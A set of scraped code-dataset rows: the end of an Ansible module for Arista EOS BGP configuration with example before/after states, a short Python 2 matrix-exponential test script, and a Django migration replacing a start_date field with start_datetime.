# neighbor 10.1.3.2 default-originate always
# neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent
# aggregate-address 1.2.1.0/24 as-set match-map match01
# aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only
# redistribute static route-map map_static
# redistribute attached-host
# !
- name: Delete configuration
arista.eos.eos_bgp_global:
config:
as_number: "100"
state: deleted
# After State:
# veos(config)#show running-config | section bgp
# router bgp 100
#
#
# Module Execution:
#
# "after": {
# "as_number": "100"
# },
# "before": {
# "as_number": "100",
# "bgp_params": {
# "additional_paths": "send",
# "convergence": {
# "slow_peer": true,
# "time": 6
# }
# },
# "vrfs": [
# {
# "aggregate_address": [
# {
# "address": "1.2.1.0/24",
# "as_set": true,
# "match_map": "match01"
# },
# {
# "address": "5.2.1.0/24",
# "advertise_only": true,
# "attribute_map": "attrmatch01"
# }
# ],
# "distance": {
# "external": 50,
# "internal": 50,
# "local": 50
# },
# "maximum_paths": {
# "max_equal_cost_paths": 55
# },
# "neighbor": [
# {
# "allowas_in": {
# "count": 3
# },
# "default_originate": {
# "always": true
# },
# "dont_capability_negotiate": true,
# "export_localpref": 4000,
# "maximum_received_routes": {
# "count": 500,
# "warning_limit": {
# "limit_percent": 5
# }
# },
# "next_hop_unchanged": true,
# "peer": "10.1.3.2"
# }
# ],
# "redistribute": [
# {
# "protocol": "static",
# "route_map": "map_static"
# },
# {
# "protocol": "attached-host"
# }
# ],
# "vrf": "vrf01"
# }
# ]
# },
# "changed": true,
# "commands": [
# "router bgp 100",
# "no vrf vrf01",
# "no bgp convergence slow-peer time 6",
# "no bgp additional-paths send any"
# ],
#
# Using purged:
# Before state:
# veos(config)#show running-config | section bgp
# router bgp 100
# bgp convergence slow-peer time 6
# distance bgp 50 50 50
# maximum-paths 55
# bgp additional-paths send any
# neighbor peer1 peer-group
# neighbor peer1 link-bandwidth update-delay 5
# neighbor peer1 fall-over bfd
# neighbor peer1 monitoring
# neighbor peer1 send-community extended link-bandwidth aggregate 600
# neighbor peer1 maximum-routes 12000
# neighbor 10.1.3.2 export-localpref 4000
# neighbor 10.1.3.2 next-hop-unchanged
# neighbor 10.1.3.2 dont-capability-negotiate
# neighbor 10.1.3.2 allowas-in 3
# neighbor 10.1.3.2 default-originate always
# neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent
# aggregate-address 1.2.1.0/24 as-set match-map match01
# aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only
# redistribute static route-map map_static
# redistribute attached-host
# !
# vlan 5
# !
# address-family ipv4
# neighbor 10.1.3.2 prefix-list prefix01 out
# !
# vrf vrf01
# route-target import 54:11
# neighbor 192.168.3.11 dont-capability-negotiate
# neighbor 192.168.3.11 allowas-in 3
# neighbor 192.168.3.11 default-originate always
# neighbor 192.168.3.11 maximum-routes 12000
# veos(config)#
- name: Purge configuration
arista.eos.eos_bgp_global:
config:
as_number: "100"
state: purged
# After State:
# veos(config)#show running-config | section bgp
# veos(config)#
# Module Execution:
# "after": {},
# "before": {
# "aggregate_address": [
# {
# "address": "1.2.1.0/24",
# "as_set": true,
# "match_map": "match01"
# },
# {
# "address": "5.2.1.0/24",
# "advertise_only": true,
# "attribute_map": "attrmatch01"
# }
# ],
# "as_number": "100",
# "bgp_params": {
# "additional_paths": "send",
# "convergence": {
# "slow_peer": true,
# "time": 6
# }
# },
# "distance": {
# "external": 50,
# "internal": 50,
# "local": 50
# },
# "maximum_paths": {
# "max_equal_cost_paths": 55
# },
# "neighbor": [
# {
# "fall_over": true,
# "link_bandwidth": {
# "set": true,
# "update_delay": 5
# },
# "maximum_received_routes": {
# "count": 12000
# },
# "monitoring": true,
# "peer": "peer1",
# "peer_group": "peer1",
# "send_community": {
# "community_attribute": "extended",
# "link_bandwidth_attribute": "aggregate",
# "speed": "600",
# "sub_attribute": "link-bandwidth"
# }
# },
# {
# "allowas_in": {
# "count": 3
# },
# "default_originate": {
# "always": true
# },
# "dont_capability_negotiate": true,
# "export_localpref": 4000,
# "maximum_received_routes": {
# "count": 500,
# "warning_limit": {
# "limit_percent": 5
# }
# },
# "next_hop_unchanged": true,
# "peer": "10.1.3.2"
# }
# ],
# "redistribute": [
# {
# "protocol": "static",
# "route_map": "map_static"
# },
# {
# "protocol": "attached-host"
# }
# ],
# "vlan": 5,
# "vrfs": [
# {
# "neighbor": [
# {
# "allowas_in": {
# "count": 3
# },
# "default_originate": {
# "always": true
# },
# "dont_capability_negotiate": true,
# "maximum_received_routes": {
# "count": 12000
# },
# "peer": "192.168.3.11"
# }
# ],
# "route_target": {
# "action": "import",
# "target": "54:11"
# },
# "vrf": "vrf01"
# }
# ]
# },
# "changed": true,
# "commands": [
# "no router bgp 100"
# ],
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.arista.eos.plugins.module_utils.network.eos.argspec.bgp_global.bgp_global import (
Bgp_globalArgs,
)
from ansible_collections.arista.eos.plugins.module_utils.network.eos.config.bgp_global.bgp_global import (
Bgp_global,
)
def main():
"""
Main entry point for module execution
:returns: the result form module invocation
"""
module = AnsibleModule(
argument_spec=Bgp_globalArgs.argument_spec,
mutually_exclusive=[],
required_if=[],
supports_check_mode=False,
)
result = Bgp_global(module).execute_module()
module.exit_json(**result)
if __name__ == "__main__":
main()
| StarcoderdataPython |
3200611 |
from rohf import expmat
from scipy.linalg.matfuncs import expm
from numpy import zeros,identity,array
n = 2
I = identity(n,'d')
#A = zeros((n,n),'d')
#A = I/3.
#A = array([[-49,24],[-64,31]],'d') # Example from Moler/Van Loan, doesn't work
#A = array([[0,0.5],[0.5,0]],'d')
A = array([[1,0.5],[0.5,1]],'d')
print A
E = expmat(A,nmax=20)
print E
print expm(A)
| StarcoderdataPython |
3302456 | # Generated by Django 3.1 on 2020-08-29 02:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('lesson_planner', '0034_auto_20200828_1857'),
]
operations = [
migrations.RemoveField(
model_name='series',
name='start_date',
),
migrations.AddField(
model_name='series',
name='start_datetime',
field=models.DateTimeField(null=True),
),
]
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.